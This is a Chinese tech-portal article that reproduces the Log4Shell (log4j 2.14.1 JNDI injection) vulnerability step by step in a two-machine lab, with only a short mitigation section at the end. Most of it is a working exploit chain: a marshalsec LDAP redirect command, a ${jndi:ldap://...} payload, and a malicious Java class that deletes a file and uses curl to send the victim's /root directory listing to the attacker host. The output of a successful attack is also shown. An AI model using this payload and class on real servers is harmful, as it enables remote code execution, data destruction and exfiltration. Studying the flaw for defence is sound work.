您当前的位置:首页 > 电脑百科 > 安全防护 > 漏洞

关于log4j2远程代码执行漏洞详细复现过程

时间:2022-09-04 14:49:53  来源:  作者:互联网资讯看板

log4j-2远程代码执行漏洞是因为log4j的版本中存在jndi(JAVA Naming and Directory Interface)注入漏洞,jndi注入是利用的动态类加载机制完成攻击的,当程序将用户输入的数据进行日志记录时,即可触发此漏洞。注意是log4j-2.x的版本,本文演示使用2.14.1。

如果在应用中使用了如log.info等一些输出用户录入的内容就可能遭到攻击者的攻击,这种将请求日志log出来的场景并不少见,比如和一些第三方系统对接的时候,在联调或试运行阶段会将请求的报文信息完整输出到日志。

摘取一个gitee上的代码样例


 

 

  • 漏洞场景

 

举个例子,jianshu-Application这个服务用来提供给用户修改个人简介的,如图


 

 

  • 漏洞重现案例的几个角色

 

角色

应用名

说明

被攻击者

jianshu-application

这个是被攻击的服务器(使用了log4j-core-2.14.1),
假设提供了个人简介的修改功能

攻击者

marshalsec-0.0.3-SNAPSHOT

开源纯Java写的一个工具,将数据转换为代码执行

攻击者

Python/ target=_blank class=infotextkey>Python-httpserver

简单模拟一个httpserver用来给被攻击者远程加载恶意class


 

大致流程如下 ①、攻击者输入恶意信息后提交,${jndi:ldap://ldap.mixfate.com:9999},当然这个ldap地址被攻击者服务器中的应用可以访问到; ②、被攻击者应用通过log.info打印恶意的输入信息后,发现日志内容中包含关键词 ${,那么这个里面包含的内容会当做变量来进行替换执行,连接到marshalsec ldap.mixfate.com:9999; ③、此时marshalsec将重定向到httpserver load.mixfate.com:8888; ④、重定向到class下载地址下载并加载Hacker.class; ⑤、执行Hacker.class中的恶意代码;

可以看到依赖重要的开源工具marshalsec,https://Github.com/mbechler/marshalsec.git

免责声明(仅用于学习或测试自有系统)

DisclAImer All information and code is provided solely for educational purposes and/or testing your own systems for these vulnerabilities. 2、漏洞重现步骤

现在我们模拟一下这个jianshu-application这个应用被攻击,并被删除掉服务器上的/root/readme.txt文件;

机器名

说明

ip

机器A(jianshu)

被攻击者

192.168.80.136

机器B(hacker)

攻击者

192.168.80.133

两台机器均安装上jdk-1.8.0_151

java version "1.8.0_151" Java(TM) SE Runtime Environment (build 1.8.0_151-b12) Java HotSpot(TM) 64-Bit Server VM (build 25.151-b12, mixed mode)

  • 步骤1、机器A(jianshu)上运行被攻击端jianshu应用(简化代码仅作重现参考)

 

简单起见直接使用 spring-boot启动一个web应用,开放一个入口模拟修改个人简介,由于spring-boot默认使用 logback 作为应用日志框架,所以为了模拟攻击过程将依赖排除掉,使用log4j-2.14.1版本记录日志。

jianshu模拟应用配置如下(使用spring-boot-2.5.7,特别注意需要排除默认使用的日志,不然无法模拟)

 

pom.xml
4.0.0 org.springframework.boot spring-boot-starter-parent 2.5.7 com.mixfate jianshu 0.0.1-SNAPSHOT jianshu jianshu project for Spring Boot 1.8 org.springframework.boot spring-boot-starter-web org.springframework.boot spring-boot-starter-logging org.springframework.boot spring-boot-starter-test test org.Apache.logging.log4j log4j-core 2.14.1 org.springframework.boot spring-boot-maven-plugin
JianshuAplication.java
package com.mixfate; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import org.springframework.boot.SpringApplication; import org.springframework.boot.autoconfigure.SpringBootApplication; import org.springframework.web.bind.annotation.PutMapping; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RestController; @RestController @RequestMapping @SpringBootApplication public class JianshuApplication { public static final Logger logger = LogManager.getLogger(); public static void main(String[] args) { SpringApplication.run(JianshuApplication.class, args); } @PutMapping("/settings") public void settings(String intro) { logger.info("{}", intro); } }

 

模拟的修改个人简介功能非常简单,一个put请求将intro参数提交即可,注意通过url传参数的话需要使用urlencode后传输,使用mvn clean package 打包好应用上传,并直接在机器A(jianshu)的服务器部署运行即可java -jar jianshu-0.0.1-SNAPSHOT.jar,作为被攻击的机器就已经准备好了,可通过curl -X PUT http://192.168.80.136:8080/settings?intro=hacker-ha-ha-ha访问测试。

此时在机器A(jianshu),ip192.168.80.136上的准备工作就完成了。

 

  • 步骤2、机器B(hacker)上运行marshalsec/httpserver

 

① 下装并编译运行marshalsec工具,这是一个纯java写的将数据转换为可执行代码工具,github地址https://github.com/mbechler/marshalsec.git,直接使用maven编译源码mvn clean package -DskipTests,将编译后的应用包marshalsec-0.0.3-SNAPSHOT-all.jar上传到机器B(hacker)上运行java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.80.133:8888/#Hacker" 9999。

这一步的目的是在Hacker机器B上开启ldap服务,机器A中的应用参数intro如果定义为${jndi:ldap://192.168.80.133:9999/Hacker} ,则可访问到这个ldap服务,而参数"http://192.168.80.133:8888/#Hacker表示将请求重定向到此地址远程加载类Hacker,当然实际上ldap和放Hacker.class的httpserver服务器不需要放同一台机器。

② 编写Hacker类如下

import java.io.File; import java.util.Arrays; import java.util.stream.Collectors; class Hacker { static { System.err.println("Hacker hahaha"); try { Runtime.getRuntime().exec("rm -rf /root/readme.txt"); File dir = new File("/root"); Runtime.getRuntime().exec("curl http://192.168.80.133:8888/" + Arrays.stream(dir.listFiles()).map(File::getName).collect(Collectors.joining(","))); } catch (Exception e) { e.printStackTrace(); } } }

这个Hacker恶意代码把机器A上的文件/root/readme.txt删除了,并且将/root目录下的文件文件名发送到攻击者的机器上。编译好Hacker.class放到一个新建的目录/www中。

③ 机器B新开一个命令窗口,进入到/www目录中,使用命令python -m SimpleHTTPServer 8888启动一个简单的httpserver,启动后使用浏览器访问http://192.168.80.133:8888/Hacker.class正常会提示下载类文件,保证jianshu服务器能从这个地址下载类即可。

参数${jndi:ldap://192.168.80.133:9999/Hacker}通过urlencode后为%24%7Bjndi%3Aldap%3A%2F%2F192.168.80.133%3A9999%2FHacker%7D 访问修改个人简介进行攻击 curl -X PUT http://192.168.80.136:8080/settings?intro=%24%7Bjndi%3Aldap%3A%2F%2F192.168.80.133%3A9999%2FHacker%7D

此时python的httpserver日志可以看到以下输出

"GET /.bash_logout,.bash_profile,.bashrc,.cshrc,.tcshrc,anaconda-ks.cfg,.bash_history,jdk-8u151-linux-x64.tar.gz,jdk1.8.0_151,.oracle_jre_usage,jianshu-0.0.1-SNAPSHOT.jar HTTP/1.1" 404 -

Hacker机器上列出了jianshu机器/root目录下的文件,说明已经成功了。

3、漏洞修复

具体的漏洞修复建议可参考一些官方的推荐做法,一种临时的改动是设置JVM启动参数-Dlog4j2.formatMsgNoLookups=true,此参数判断是否执行lookups。

打开MessagePatternConverter的源码查看


 

在构造方法中初始化了参数noLookups


 

在常量中定义了默认值



Tags:log4j2   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,不构成投资建议。投资者据此操作,风险自担。如有任何标注错误或版权侵犯请与我们联系,我们将及时更正、删除。
▌相关推荐
基于 log4j2 插件实现统一日志脱敏,性能远超正则替换
前言金融用户敏感数据如何优雅地实现脱敏?日志脱敏之后,无法根据信息快速定位怎么办?经过了这两篇文章之后,我们对日志脱敏应该有了一定的理解。但是实际项目中,我们遇到的情况往...【详细内容】
2023-06-05  Search: log4j2  点击:(139)  评论:(0)  加入收藏
关于log4j2远程代码执行漏洞详细复现过程
log4j-2远程代码执行漏洞是因为log4j的版本中存在jndi(java Naming and Directory Interface)注入漏洞,jndi注入是利用的动态类加载机制完成攻击的,当程序将用户输入的数据进...【详细内容】
2022-09-04  Search: log4j2  点击:(596)  评论:(0)  加入收藏
排查 log4j2 安全漏洞的一次经历
简介2021年底,技术圈被 log4j2 漏洞掀起巨浪,各大安全公司纷纷发文介绍该漏洞的危害,并给出了各种临时解决方案。还有一些博主也发表文章教我们如何找到易受攻击的地方,并采取相...【详细内容】
2022-08-17  Search: log4j2  点击:(506)  评论:(0)  加入收藏
从源码看Log4j2、FastJson漏洞
远程代码漏洞对广大程序员来并不陌生,远程代码执行是指攻击者可能会通过远程调用的方式来攻击或控制计算机设备,无论该设备在哪里。如果远程代码执行的是一个死循环那服务器...【详细内容】
2021-12-31  Search: log4j2  点击:(377)  评论:(0)  加入收藏
SpringBoot整合log4j2进行日志配置及防坑指南
1、Log4j2优点具体优点可以参考官方文档:https://logging.apache.org/log4j/2.x/我这边只简单说一下:相比与其他的日志系统,log4j2丢数据的情况少;在多线程环境下,性能高于logbac...【详细内容】
2019-12-17  Search: log4j2  点击:(472)  评论:(0)  加入收藏
▌简易百科推荐
 Opera 漏洞可能让黑客在 Mac 或 Windows 上运行任何文件
网络安全研究人员披露了 Microsoft Windows 和 Apple macOS Opera 网络浏览器中的一个现已修补的安全漏洞,该漏洞可被利用来执行底层操作系统上的任何文件。Guardio Labs研究...【详细内容】
2024-01-19  科技大人物    Tags:漏洞   点击:(76)  评论:(0)  加入收藏
俄黑客组织利用WinRAR漏洞攻击乌克兰
据Securityaffairs网站消息,具有俄罗斯背景的黑客组织UAC-0099正在利用WinRAR中的一个零日漏洞(已修复,编号CVE-2023-38831)对乌克兰传播LONEPAGE恶意软件。实际上,自2022年中旬...【详细内容】
2023-12-27  区块软件开发  今日头条  Tags:漏洞   点击:(149)  评论:(0)  加入收藏
一文带你了解数据库层的安全漏洞及其危害性
数据库层的安全漏洞是Web应用程序中最常见且最简单的漏洞之一。这种漏洞的主要原因是程序没有对用户输入的数据进行合法性判断和处理,从而导致攻击者能够在Web应用程序中注入...【详细内容】
2023-12-19  科技界脑洞    Tags:漏洞   点击:(151)  评论:(0)  加入收藏
七个优秀开源免费Web安全漏洞扫描工具
Web安全漏洞扫描技术是一种用于检测Web应用中潜在的漏洞或者安全风险的自动化测试技术。Web安全扫描工具可以模拟黑客行为,检测常见的漏洞,例如:Sql注入、XSS、文件上传、目录...【详细内容】
2023-11-17  andflow  微信公众号  Tags:安全漏洞   点击:(229)  评论:(0)  加入收藏
2023年TOP 5 Kubernetes漏洞
译者 | 晶颜审校 | 重楼Kubernetes是一个流行的开源平台,用于管理容器化的工作负载和服务。它是一个简化了大量部署、扩展和操作任务的系统,但它并非没有风险。就像任何其他软...【详细内容】
2023-11-15    51CTO  Tags:漏洞   点击:(313)  评论:(0)  加入收藏
SysAid IT 曝出零日漏洞,需尽快安装补丁
根据微软的最新发现,以传播 Clop 勒索软件而闻名的 Lace Tempest 黑客组织,近日利用 SysAid IT 支持软件的零日漏洞实施了攻击。该黑客组织曾经还利用 MOVEit Transfer 和 Pap...【详细内容】
2023-11-10  沐雨花飞蝶  微信公众号  Tags:SysAid   点击:(248)  评论:(0)  加入收藏
常见Windows远程漏洞信息整理
通过漏洞扫描,发现漏洞,更新补丁,增强内网安全防御能力。1.常见windows提权漏洞(1)MS08-067 Windows服务漏洞漏洞描述:该漏洞影响Windows Server 2000、Windows XP和Windows 2003...【详细内容】
2023-11-07  小兵搞安全  微信公众号  Tags:漏洞   点击:(276)  评论:(0)  加入收藏
报告称微软 Skype 移动应用存在严重漏洞,可轻易泄露用户 IP 地址
IT之家 8 月 29 日消息,据 404Media.co 报道,微软的 Skype 移动应用存在一个严重的漏洞,可能导致黑客通过发送一个链接就能检测到用户的 IP 地址。该漏洞只需利用 Skype 的文本...【详细内容】
2023-08-29    IT之家  Tags:漏洞   点击:(150)  评论:(0)  加入收藏
可绕过苹果三重防护机制,专家发现 macOS 新漏洞
IT之家 8 月 15 日消息,近期在拉斯维加斯举行的 Defcon 黑客大会上,安全研究员帕特里克・沃德尔(Patrick Wardle)展示了 macOS 新漏洞,可以绕过苹果设置的三重防护机制,窃取设备敏...【详细内容】
2023-08-15    IT之家  Tags:漏洞   点击:(211)  评论:(0)  加入收藏
两个新漏洞可能影响 40% 的 Ubuntu 云工作负载
云安全公司 Wiz 的研究人员在 Ubuntu 的 OverlayFS 模块中发现了两个易于利用的权限提升漏洞,影响了 40% 的 Ubuntu 云工作负载。OverlayFS 是一种联合文件系统,允许一个文件...【详细内容】
2023-07-28    云安全公司 Wiz 的研究人员在 Ubuntu 的 OverlayFS 模块中发现了两个易于利用的权限提升漏洞,影响了   Tags:漏洞   点击:(226)  评论:(0)  加入收藏
站内最新
站内热门
站内头条